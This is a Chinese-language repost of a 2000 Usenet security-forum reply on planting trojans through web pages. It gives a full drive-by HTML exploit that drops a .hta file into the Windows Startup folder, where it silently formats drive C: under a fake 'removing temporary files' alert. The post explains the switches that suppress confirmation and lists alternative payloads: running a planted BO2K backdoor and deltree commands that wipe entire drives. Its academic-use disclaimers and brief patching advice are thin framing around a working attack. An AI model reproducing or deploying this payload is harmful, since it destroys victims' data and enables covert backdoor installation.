網頁中安裝的木馬
收錄這篇文章只是提醒網友們,網際網路不是安全的環境,道高一尺,魔高一丈,任何技術一直在進步,很多人都在默默的研究和修補系統漏洞,當然也有很多「不懂事的人」在私底下做壞事〈只會拿著現成的工具到處攻擊別人那種人〉? F在台灣的電子商務尚未成熟,還有一段好長的路要走,置身網路中也別為了一時之便,隨意留下個人資料,在你遨遊網路時也要時時刻刻做好安全措施喔。以下的文章千萬不能拿去做壞事...
From:
alerter.bbs@bbs.cs.nthu.edu.tw (小色男)
Newsgroups: tw.bbs.comp.security
Subject: Re: 裝木馬的技巧????
Date: 26 Sep 2000 08:51:56 GMT
Organization: 清華資訊(楓橋驛站)
網頁安裝木馬其實也是有可能的
<HTML>
<header></header>
<BODY>
Hacking Your Computer .
<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC">
</object>
<SCRIPT>
scr.Reset();
scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\啟動\\hack.hta";
scr.Doc="
<SCRIPT>wsh.Run('start.exe /m FORMat c:/q /autotest /u');
alert('IMPORTANT : Windows is removing unused temporary files.');";
scr.write();
</BODY>
</HTML>
(懂HTML的人應該就看得出來其中精隨)
現在我大概來解釋其中幾個項目所寫的意思
scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\啟動\\hack.hta"
這一項就是指當你看到這網頁它會寫入到你的電腦啟動目錄底下,並命名為hack.hta
wsh.Run('start.exe /m FORMat c:/q /autotest /u');
通常要格式化硬碟都會先問你是否要執行,但其中的"/autotest"這項。
它是一個微軟沒有公開的功能,鍵入後FORMat的動作便會被強制執行。
這項中的/q /u是令系統不需要檢查硬碟便會立即執行的指令。
最後start.exe再配合/m選項可以使FORMat的DOS-prompt視窗在執行的時候處於最小化的狀態。
執行其他攻擊指令的方法:
只要修改“start.exe /m FORMat c:/q /autotest /u”這一項便形。
start.exe /m FORMat c:/q /autotest /u
其中的“c:”可以換做其他的硬碟。
(path)\bo2k.exe
執行它電腦中的某個程式,如果你有傳bo2k到它電腦中就可以使用此指令。
start.exe /m deltree /y a:\*.* c:\*.* d:\*.*
殺掉對方硬碟底下所有的檔案。
start.exe /m deltree /y c:\windows\system\*.*
殺掉對方c:\windows\system\目錄底下的所有檔案。
後敘:
預防遭此手段的破壞就是到微軟去更新你的瀏覽器。
請勿拿來害人,只供給學術研究來使用!!! 這篇是由別的論壇裡挖出來的!!
